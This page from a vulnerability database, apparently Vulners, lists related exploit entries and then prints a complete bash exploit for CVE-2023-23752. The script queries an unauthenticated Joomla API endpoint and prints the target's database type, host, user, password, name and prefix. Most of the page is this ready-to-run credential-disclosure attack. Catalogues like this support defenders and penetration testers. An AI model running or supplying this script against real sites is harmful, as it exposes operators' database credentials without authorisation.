| Reporter | Title | Published | Views | Family All 68 |
|---|---|---|---|---|
| Joomla! 4.2.7 Unauthenticated Information Disclosure Exploit | 28 Mar 202300:00 | – | zdt | |
| Joomla! v4.2.8 - Unauthenticated information disclosure Exploit | 8 Apr 202300:00 | – | zdt | |
| Joomla 4.2.8 Information Disclosure Exploit | 22 May 202400:00 | – | zdt | |
| Exploit for Improper Access Control in Joomla Joomla\! | 29 Nov 202317:01 | – | githubexploit | |
| Exploit for Improper Access Control in Joomla Joomla\! | 31 Jul 202507:13 | – | githubexploit | |
| Exploit for Improper Access Control in Joomla Joomla\! | 19 Feb 202410:27 | – | githubexploit | |
| Exploit for Improper Access Control in Joomla Joomla\! | 5 May 202416:16 | – | githubexploit | |
| Exploit for Improper Access Control in Joomla Joomla\! | 4 May 202418:44 | – | githubexploit | |
| Exploit for Improper Access Control in Joomla Joomla\! | 18 Dec 202300:47 | – | githubexploit | |
| Exploit for Improper Access Control in Joomla Joomla\! | 26 Mar 202313:58 | – | githubexploit |
`#!/bin/bash
# Exploit Title: Joomla! <= 4.2.8 - Unauthenticated Information Disclosure
# Date: 2024-05-21
# CVE: CVE-2023-23752
# Exploit Author: Miguel Redondo (aka d4t4s3c)
# Vendor Homepage: https://www.joomla.org
# Software Link: https://downloads.joomla.org
# Version: <= 4.2.8
# Tested on: Linux
# Category: Web Application
while getopts ":u:" arg; do
case ${arg} in
u) url=${OPTARG}; let parameter_counter+=1 ;;
esac
done
if [ -z "${url}" ]; then
echo -e "\n[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure"
echo -e "\n[-] Usage: CVE-2023-23752.sh -u <url>\n"
exit 1
else
echo -e "\n[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure"
curl --silent --insecure "${url}/api/index.php/v1/config/application?public=true" > out.tmp
echo -e "\n[i] Database info:\n"
echo -e "[+] DB Type: $(sed -E 's/.*"dbtype":"([^"]+)".*/\1/' out.tmp)"
echo -e "[+] DB Host: $(sed -E 's/.*"host":"([^"]+)".*/\1/' out.tmp)"
echo -e "\e[92m[+] DB User: $(sed -E 's/.*"user":"([^"]+)".*/\1/' out.tmp)\e[0m"
echo -e "\e[92m[+] DB Password: $(sed -E 's/.*"password":"([^"]+)".*/\1/' out.tmp)\e[0m"
echo -e "[+] DB Name: $(sed -E 's/.*"db":"([^"]+)".*/\1/' out.tmp)"
echo -e "[+] DB Prefix: $(sed -E 's/.*"dbprefix":"([^"]+)".*/\1/' out.tmp)"
echo -e "[+] DB Encryptation: $(sed -E 's/.*"dbencryption":([0-9]+).*/\1/' out.tmp)\n"
exit 0
fi
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation